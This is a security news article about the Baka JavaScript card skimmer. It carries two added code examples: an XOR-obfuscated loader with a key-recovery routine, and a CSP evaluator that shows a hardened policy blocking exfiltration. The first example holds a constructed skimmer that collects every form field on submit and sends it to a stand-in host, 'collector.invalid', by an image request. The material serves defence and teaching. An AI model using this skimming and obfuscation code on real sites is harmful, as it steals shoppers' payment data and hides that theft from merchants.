
New Stealthy JavaScript Skimmer Found Targeting E-Commerce Merchants

Web skimming attacks, now using new camouflage schemes to evade detection, have continued to pose a major security threat to the e-commerce sector in 2020. Recently, online stores in several countries were compromised with a new JavaScript skimmer dubbed Baka.

The background

Active since February 2020, Baka is the first JavaScript skimmer Visa has observed using an XOR cipher to obfuscate both the skimming code it downloads from its command-and-control (C2) server and the hard-coded values in its loader. The C2 infrastructure behind Baka has also hosted the ImageID web skimming kit.
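The loader-plus-XOR-blob pattern described above, as an added example that is not code from the Baka skimmer, its C2 server or Visa's report. It shows the mechanism (a loader that carries the real skimmer as XOR-obfuscated bytes next to the key and decodes it at run time) and goes one step beyond the text with an analyst technique for recovering the key from the blob alone using a known-plaintext "crib". The key `k3y!`, the stand-in skimmer source and the `collector.invalid` host are constructed for the example.

```javascript
// Added example, not code from the Baka skimmer, its C2 server or Visa's report.
// Demonstrates a loader that embeds its payload as XOR-obfuscated bytes plus the
// key, and how an analyst recovers the key from the blob with a crib.
// KEY, SKIMMER_SOURCE and the crib are constructed. Runs under Node.js.

// Repeating-key XOR is an involution: the same routine obfuscates and decodes.
function xorBytes(data, key) {
  const out = Buffer.alloc(data.length);
  for (let i = 0; i < data.length; i++) out[i] = data[i] ^ key[i % key.length];
  return out;
}

// Attacker build step: turn the skimmer source into the hex blob embedded in the loader.
function obfuscate(text, keyText) {
  return xorBytes(Buffer.from(text, 'utf8'), Buffer.from(keyText, 'utf8')).toString('hex');
}

// Loader run-time step: recover the source (a real loader would then eval/inject it).
function deobfuscate(hex, keyText) {
  return xorBytes(Buffer.from(hex, 'hex'), Buffer.from(keyText, 'utf8')).toString('utf8');
}

// Analyst step when only the blob was captured: the plaintext is JavaScript, so a
// short fragment such as "document." almost certainly occurs in it. Sliding the
// crib across the blob and XOR-ing proposes a key at every offset; a crib at least
// as long as the key fixes every key byte. Keep the candidates that decode the
// whole blob to printable text (the true key always does).
function recoverKeys(hex, crib, keyLen) {
  const data = Buffer.from(hex, 'hex');
  const cribBytes = Buffer.from(crib, 'utf8');
  if (cribBytes.length < keyLen) throw new Error('crib must be at least as long as the key');
  const found = new Set();
  for (let off = 0; off + cribBytes.length <= data.length; off++) {
    const key = Buffer.alloc(keyLen);
    for (let j = 0; j < keyLen; j++) key[(off + j) % keyLen] = data[off + j] ^ cribBytes[j];
    const plain = xorBytes(data, key);
    if (plain.every((b) => b === 0x0a || (b >= 0x20 && b <= 0x7e))) found.add(key.toString('latin1'));
  }
  return [...found];
}

// Constructed stand-in for a decoded skimmer: harvests form inputs on submit and
// ships them out in an image request (the exfiltration style the page mentions).
const SKIMMER_SOURCE = [
  "document.querySelector('form').addEventListener('submit', function () {",
  "  var data = {};",
  "  document.querySelectorAll('input').forEach(function (e) { data[e.name] = e.value; });",
  "  new Image().src = 'https://collector.invalid/p.gif?d=' + btoa(JSON.stringify(data));",
  "});",
].join('\n');
const KEY = 'k3y!'; // constructed; Baka is reported to use per-victim parameters

function demo() {
  const blob = obfuscate(SKIMMER_SOURCE, KEY);
  const roundtrip = deobfuscate(blob, KEY) === SKIMMER_SOURCE;
  const keys = recoverKeys(blob, 'document.', KEY.length);
  console.log('blob prefix :', blob.slice(0, 48) + '...');
  console.log('roundtrip ok:', roundtrip);
  console.log('keys        :', keys);
  return { roundtrip, keys };
}

demo();
```

The crib recovery is a generic trick for any repeating-key XOR blob, not something specific to Baka; in practice the loader usually carries the key, so `deobfuscate` with the extracted key is the normal first step and the crib search is the fallback when only the blob was captured.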

What happened recently?

  • In late August 2020, Visa Payment Fraud Disruption (PFD) reported seven C2 servers hosting the Baka skimming kit.
  • The kit has the basic features common to skimmers, such as data exfiltration via image requests and configurable target form fields, combined with a unique obfuscation method and loader.

Recent skimmer attacks

Magecart and other digital skimming attacks have been causing significant brand damage by stealing customers’ credit card numbers from websites or checkout pages.
  • This month, Magecart hackers compromised a number of US-based online stores managed by Warner Music.
  • Moreover, a variant of the Magecart credit card skimmer was found using Telegram Messenger to collect and transmit the information from data harvesting scripts.
  • In August, the American Payroll Association suffered a skimming attack.
  • In the same month, Magecart attackers were using homoglyph techniques to fool users into visiting malicious websites in a credit card skimming campaign.

Best practices

Visa has alerted member financial institutions, e-commerce merchants, service providers, third-party vendors, system integrators, and resellers to this threat. Organizations should protect their e-commerce environments with trusted Content Delivery Networks (CDNs), a web application firewall (WAF), a content security policy (CSP), and other security controls, and should apply the latest security patches to their deployed content management systems (CMSes) and e-commerce frameworks.
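The image-request exfiltration mentioned under "What happened recently?" and the content security policy recommended above, put side by side as an added example that is not code from the page, the Baka skimmer or Visa. A constructed skimmer beacon is evaluated against a permissive policy and a tightened one. The evaluator implements a simplified subset of CSP source matching ('self', 'none', *, scheme sources such as https:, host sources with an optional *. prefix, no ports or paths); browsers implement the full rules. The merchant origin `shop.example`, the C2 host `collector.invalid` and both policies are assumptions.

```javascript
// Added example, not code from the page, the Baka skimmer or Visa. Evaluates a
// constructed image-request beacon against a weak and a hardened CSP using a
// simplified subset of CSP source matching. PAGE_ORIGIN, the C2 host and the
// policies are constructed. Runs under Node.js.

const PAGE_ORIGIN = 'https://shop.example'; // assumed merchant origin

// Skimmer side (constructed stand-in): harvested fields ride out as a query
// string on a fake image fetch, so the "request" is a plain GET governed by img-src.
function beaconUrl(c2, fields) {
  return c2 + '?d=' + Buffer.from(JSON.stringify(fields)).toString('base64');
}

// "default-src 'self'; img-src 'self' https://cdn.shop.example" -> Map(directive -> sources)
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives;
}

// Does one source expression permit a fetch of `url` from a page at `pageOrigin`?
function sourceMatches(src, url, pageOrigin) {
  const u = new URL(url);
  const page = new URL(pageOrigin);
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === '*') return true;                                  // real CSP still excludes data:, blob:
  if (s === "'self'") return u.origin === page.origin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return u.protocol === s;   // scheme-source, e.g. https:
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)$/); // host-source
  if (!m) return false;                                        // 'unsafe-inline' etc. never match a URL
  const [, scheme, wildcard, host] = m;
  if (scheme && u.protocol !== scheme + ':') return false;
  if (!scheme && u.protocol !== page.protocol) return false;    // simplified: same scheme as the page
  return wildcard ? u.hostname.endsWith('.' + host) : u.hostname === host;
}

// Fetch directives fall back to default-src when absent; no directive at all means unrestricted.
function isAllowed(policy, directive, url, pageOrigin = PAGE_ORIGIN) {
  const csp = parseCsp(policy);
  const sources = csp.get(directive) ?? csp.get('default-src');
  if (!sources) return true;
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

// Weak: a wildcard default-src lets the beacon (and an injected loader) through.
const WEAK_CSP = "default-src *; script-src * 'unsafe-inline'";
// Hardened: every fetch type is pinned to the merchant's own hosts, violations are reported.
const HARDENED_CSP = [
  "default-src 'self'",
  "script-src 'self' https://cdn.shop.example",
  "img-src 'self' https://cdn.shop.example",
  "connect-src 'self' https://api.shop.example",
  "report-uri /csp-report",
].join('; ');

function demo() {
  const exfil = beaconUrl('https://collector.invalid/p.gif', { cc: '4111111111111111', cvv: '123' });
  const results = {
    weakImg: isAllowed(WEAK_CSP, 'img-src', exfil),                                  // true
    hardenedImg: isAllowed(HARDENED_CSP, 'img-src', exfil),                          // false
    hardenedConnect: isAllowed(HARDENED_CSP, 'connect-src', exfil),                  // false (fetch/XHR beacon)
    hardenedLoader: isAllowed(HARDENED_CSP, 'script-src', 'https://collector.invalid/loader.js'), // false
    legitImg: isAllowed(HARDENED_CSP, 'img-src', 'https://cdn.shop.example/logo.png'), // true
  };
  console.log(results);
  return results;
}

demo();
```

Two practitioner caveats: `report-uri` (or `report-to`) turns each blocked beacon into a violation report from the customer's browser, which is a useful detection signal for an injected skimmer; and CSP does not help when the skimmer arrives inside a script the policy already trusts, such as a compromised first-party or CDN file, so pair it with patching, Subresource Integrity where the script is static, and routine review of the JavaScript loaded on checkout pages.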

Cyware Publisher